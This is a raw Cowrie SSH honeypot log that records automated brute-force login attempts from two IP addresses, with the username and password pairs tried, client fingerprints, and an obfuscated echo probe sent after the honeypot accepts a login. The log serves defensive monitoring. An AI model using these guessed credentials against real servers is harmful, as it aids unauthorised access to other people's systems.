{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:16:54.786279Z","src_ip":"217.154.1.158","session":"68c5b1779c79"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:16:54.806024Z","src_ip":"217.154.1.158","session":"68c5b1779c79"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev","message":"login attempt [dev/dev] failed","sensor":"my-vps","timestamp":"2025-08-26T20:16:54.859476Z","src_ip":"217.154.1.158","session":"68c5b1779c79"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:16:55.876049Z","src_ip":"217.154.1.158","session":"68c5b1779c79"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58722,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7f6683747a4","protocol":"ssh","message":"New connection: 212.227.125.160:58722 (1.2.3.4:22) [session: e7f6683747a4]","sensor":"my-vps","timestamp":"2025-08-26T20:17:01.177791Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:17:01.325650Z","src_ip":"212.227.125.160","session":"e7f6683747a4"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:17:01.352478Z","src_ip":"212.227.125.160","session":"e7f6683747a4"}
{"eventid":"cowrie.login.success","username":"root","password":"joyjoy","message":"login attempt [root/joyjoy] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:17:02.219703Z","src_ip":"212.227.125.160","session":"e7f6683747a4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:17:02.893724Z","src_ip":"212.227.125.160","session":"e7f6683747a4"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:17:02.894833Z","src_ip":"212.227.125.160","session":"e7f6683747a4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:17:03.107961Z","src_ip":"212.227.125.160","session":"e7f6683747a4"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:17:03.109397Z","src_ip":"212.227.125.160","session":"e7f6683747a4"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":44516,"dst_ip":"1.2.3.4","dst_port":22,"session":"59630c823a3e","protocol":"ssh","message":"New connection: 217.154.1.158:44516 (1.2.3.4:22) [session: 59630c823a3e]","sensor":"my-vps","timestamp":"2025-08-26T20:17:12.393322Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:17:12.394100Z","src_ip":"217.154.1.158","session":"59630c823a3e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:17:12.408947Z","src_ip":"217.154.1.158","session":"59630c823a3e"}
{"eventid":"cowrie.login.failed","username":"oceanbase","password":"oceanbase","message":"login attempt [oceanbase/oceanbase] failed","sensor":"my-vps","timestamp":"2025-08-26T20:17:12.452347Z","src_ip":"217.154.1.158","session":"59630c823a3e"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:17:13.468436Z","src_ip":"217.154.1.158","session":"59630c823a3e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46366,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ae83a3154a8","protocol":"ssh","message":"New connection: 212.227.125.160:46366 (1.2.3.4:22) [session: 3ae83a3154a8]","sensor":"my-vps","timestamp":"2025-08-26T20:17:23.255426Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:17:23.256592Z","src_ip":"212.227.125.160","session":"3ae83a3154a8"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:17:23.281193Z","src_ip":"212.227.125.160","session":"3ae83a3154a8"}
{"eventid":"cowrie.login.success","username":"root","password":"hammer","message":"login attempt [root/hammer] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:17:23.352764Z","src_ip":"212.227.125.160","session":"3ae83a3154a8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:17:23.477397Z","src_ip":"212.227.125.160","session":"3ae83a3154a8"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:17:23.478189Z","src_ip":"212.227.125.160","session":"3ae83a3154a8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:17:23.503319Z","src_ip":"212.227.125.160","session":"3ae83a3154a8"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:17:23.504616Z","src_ip":"212.227.125.160","session":"3ae83a3154a8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45402,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b96206652df","protocol":"ssh","message":"New connection: 212.227.125.160:45402 (1.2.3.4:22) [session: 5b96206652df]","sensor":"my-vps","timestamp":"2025-08-26T20:17:26.582499Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:17:26.583538Z","src_ip":"212.227.125.160","session":"5b96206652df"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:17:26.607146Z","src_ip":"212.227.125.160","session":"5b96206652df"}
{"eventid":"cowrie.login.success","username":"root","password":"fouzia","message":"login attempt [root/fouzia] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:17:26.688332Z","src_ip":"212.227.125.160","session":"5b96206652df"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:17:26.753644Z","src_ip":"212.227.125.160","session":"5b96206652df"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:17:26.754411Z","src_ip":"212.227.125.160","session":"5b96206652df"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:17:26.778738Z","src_ip":"212.227.125.160","session":"5b96206652df"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:17:26.779861Z","src_ip":"212.227.125.160","session":"5b96206652df"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":54108,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7c639e3418e","protocol":"ssh","message":"New connection: 217.154.1.158:54108 (1.2.3.4:22) [session: d7c639e3418e]","sensor":"my-vps","timestamp":"2025-08-26T20:17:29.892155Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:17:29.893312Z","src_ip":"217.154.1.158","session":"d7c639e3418e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:17:29.907727Z","src_ip":"217.154.1.158","session":"d7c639e3418e"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse","message":"login attempt [lighthouse/lighthouse] failed","sensor":"my-vps","timestamp":"2025-08-26T20:17:29.954865Z","src_ip":"217.154.1.158","session":"d7c639e3418e"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:17:30.971623Z","src_ip":"217.154.1.158","session":"d7c639e3418e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45418,"dst_ip":"1.2.3.4","dst_port":22,"session":"518e52989448","protocol":"ssh","message":"New connection: 212.227.125.160:45418 (1.2.3.4:22) [session: 518e52989448]","sensor":"my-vps","timestamp":"2025-08-26T20:17:31.957781Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:17:31.959024Z","src_ip":"212.227.125.160","session":"518e52989448"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:17:31.980387Z","src_ip":"212.227.125.160","session":"518e52989448"}
{"eventid":"cowrie.login.success","username":"root","password":"flamenco","message":"login attempt [root/flamenco] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:17:32.075864Z","src_ip":"212.227.125.160","session":"518e52989448"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:17:32.193755Z","src_ip":"212.227.125.160","session":"518e52989448"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:17:32.194459Z","src_ip":"212.227.125.160","session":"518e52989448"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:17:32.222022Z","src_ip":"212.227.125.160","session":"518e52989448"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:17:32.223113Z","src_ip":"212.227.125.160","session":"518e52989448"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49820,"dst_ip":"1.2.3.4","dst_port":22,"session":"71d57a937557","protocol":"ssh","message":"New connection: 212.227.125.160:49820 (1.2.3.4:22) [session: 71d57a937557]","sensor":"my-vps","timestamp":"2025-08-26T20:17:32.245938Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:17:32.246779Z","src_ip":"212.227.125.160","session":"71d57a937557"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T20:17:32.271367Z","src_ip":"212.227.125.160","session":"71d57a937557"}
{"eventid":"cowrie.login.success","username":"root","password":"espoire","message":"login attempt [root/espoire] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:17:32.385947Z","src_ip":"212.227.125.160","session":"71d57a937557"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:17:32.503232Z","src_ip":"212.227.125.160","session":"71d57a937557"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T20:17:32.504136Z","src_ip":"212.227.125.160","session":"71d57a937557"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:17:32.528037Z","src_ip":"212.227.125.160","session":"71d57a937557"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:17:32.529227Z","src_ip":"212.227.125.160","session":"71d57a937557"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":46586,"dst_ip":"1.2.3.4","dst_port":22,"session":"4fca86f5fae4","protocol":"ssh","message":"New connection: 217.154.1.158:46586 (1.2.3.4:22) [session: 4fca86f5fae4]","sensor":"my-vps","timestamp":"2025-08-26T20:17:47.296958Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:17:47.297895Z","src_ip":"217.154.1.158","session":"4fca86f5fae4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:17:47.314294Z","src_ip":"217.154.1.158","session":"4fca86f5fae4"}
